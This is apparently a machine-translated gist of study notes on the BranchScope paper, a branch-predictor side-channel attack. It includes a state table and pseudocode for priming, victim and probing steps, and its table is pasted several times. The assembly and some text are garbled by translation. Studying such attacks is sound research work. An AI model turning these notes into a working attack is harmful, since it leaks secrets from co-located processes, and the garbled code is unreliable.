BranchScope Article memo by herumi

Original here, just run through Google Translate and fixed formatting.

Whitepaper: BranchScope: A New Side-ChannelAttack on Directional Branch Predictor

Caution: I still do not understand the essential part

I might update it (maybe I can not dig into anymore because the condition that can be attacked is too severe to think that it is usually impossible)

Overview

BranchScope: Side channel attack that guesses the direction of arbitrary conditional branch by manipulating the direction prediction (Directional branch predictor) of the shared branch
Here the direction of branch is likely to branch (Taken) · prediction that it will not branch (Not taken)
It is different from existing attack using BTB (branch target buffer)
BTB is a buffer that records the result of the conditional branch executed last time
Executable in user space
Error rate is 1% or less
Can attack against SGX be possible?

Branch prediction unit BPU (branch prediction units)

BPU: Predicts a conditional branch
It consists largely of two kinds of elements
- L1 (level-1) prediction
  - PHT (pattern history table) 2 bit saturation counter
    - Two mode prediction associated with program counter (pc)
- gshare format L2 prediction
  - Prediction using past information other than branch address
Branch prediction is done taking both predictions into account
- This attack uses only L1 prediction

Attack model

Character

victim (victim) has confidential information
spy (attacker) steals information without directly accessing the secret information

condition

victim and spy are running on the same physical core
- To share BPU
Victim runs slowly
- Victim's program must move slowly for high-precision branchscope attack
  - Do it with another attack (performance degradation attack etc.) to do it
  - Fiddling with the scheduler
It is possible to control timing of code execution of victim

Attack Summary

Stage 1: Initialize the PHT entry
- Attacker brings PHT to a certain state
- spy executes the code to be described later
Stage 2: Running victim
- Execute only one conditional branch (?)
Stage 3: Exploring PHT entries
- spy executes the same conditional branch as the PHT entry used by victim and observes it

Attack possibility

First of all let me do 1-level prediction only
how?
In the experiment of branch prediction, the mistake rate of about 50% drops to 10% at 3, 4 times at the first time and it becomes almost 0% at 5 to 7 times
Since L1 predictable information does not exist in the initial state, L1 prediction is used

randomize_pht:
  cmp% rcx,% rcx
  je. L 0
  nop
.L0:
  jne. L1
  nop
.L1:
  je. L2
  ...
. L99999:
  nop
`` `
* Choose je and jne randomly
* It repeats it 100000 times
* Experiment result L2 prediction is no longer used

# L1 predicted 2-bit FSM (finite state machine)

* T; taken (branching)
* N; not taken (not branching)
* H; Branch prediction success (hit)
* M; branch prediction failure (miss)
* SN: strongly not taken; it does not branch strongly
* WN: weakly not taken; Weakly not to branch
* ST: strongly taken; Strongly branching
* WT: weakly taken; Weakly branching

T T T SN → WN → WT → ST ← ← ← N N N

State after Prime	Prime	State after Target	Target	Probe	Observation
TTT	ST	T	ST	TT	HH
TTT	ST	T	ST	NN	MM
TTT	ST	N	WT	TT	HH
TTT	ST	N	WT	NN	MH
NNN	SN	T	WN	TT	MH
NNN	SN	T	WN	NN	HH
NNN	SN	N	SN	TT	MM
NNN	SN	N	SN	NN	HH

If Probe is TT HH, NN then MM you can predict that the state after Target was ST

State of branch prediction

There is quite a lot of noise when examining the distribution
Looking at the entry of PHT in detail, it seems that the address is 14 bits apart using the same (lower 14 bits as key?)

Implementation

victim code

int sec_data [] = {1, 0, 1, ...};
void victim () {
  if (sec_data [i])
    asm ("nop; nop");
  i ++;
}

spy code

int probe_array [] = {1, 1};
int main ()
{
  randomize_pht ();
  sleep (); // wait for victim
  spy (probe_arr);
}

void spy (int array [2]) {
  for (int i = 0; i <2; i ++) {
    int a = read_branch_mispred_counter ();
    if (array [i])
      asm ("nop; nop; nop");
    int b = read_branch_mispred_counter ();
    store_branch_mispred_data (b - a);
  }
}

spy can force victim's process to execute a conditional branch instruction only once between context switches
- Since the OS can be controlled in the SGX scenario, there is an assumption
Set the virtual address of the conditional branch instruction of victim and the conditional branch instruction of spy to the same
- In order to conflict PHT of victim and spy
spy executes randomize_pht () and sleep ()
victim () executes a conditional branch only once based on confidential information (stop)
spy reads conditional branch counter and branches based on array []
Check the condition branch counter again to see if the read value does not change or is incremented by 1

Experimental result

Skylake and Haswell have less than 1% error rate
3 to 5% error rate with Sandy Bridge

Time stamp counter

Privilege elevation is required to access conditional branch counter
substitute with rdtsc (p)
- Conditional branch mistake takes extra 20 cycles extra, so it can be determined by that

avelardi/branchscope-en.md

BranchScope Article memo by herumi

Original here, just run through Google Translate and fixed formatting.

Caution: I still do not understand the essential part

Overview

Branch prediction unit BPU (branch prediction units)

Attack model

Character

condition

Attack Summary

Attack possibility

State of branch prediction

Implementation

Experimental result

Time stamp counter

tarqd commented May 4, 2018

State after Prime	Prime	State after Target	Target	Probe	Observation
TTT	ST	T	ST	TT	HH
TTT	ST	T	ST	NN	MM
TTT	ST	N	WT	TT	HH
TTT	ST	N	WT	NN	MH
NNN	SN	T	WN	TT	MH
NNN	SN	T	WN	NN	HH
NNN	SN	N	SN	TT	MM
NNN	SN	N	SN	NN	HH

State after Prime	Prime	State after Target	Target	Probe	Observation
TTT	ST	T	ST	TT	HH
TTT	ST	T	ST	NN	MM
TTT	ST	N	WT	TT	HH
TTT	ST	N	WT	NN	MH
NNN	SN	T	WN	TT	MH
NNN	SN	T	WN	NN	HH
NNN	SN	N	SN	TT	MM
NNN	SN	N	SN	NN	HH

State after Prime	Prime	State after Target	Target	Probe	Observation
TTT	ST	T	ST	TT	HH
TTT	ST	T	ST	NN	MM
TTT	ST	N	WT	TT	HH
TTT	ST	N	WT	NN	MH
NNN	SN	T	WN	TT	MH
NNN	SN	T	WN	NN	HH
NNN	SN	N	SN	TT	MM
NNN	SN	N	SN	NN	HH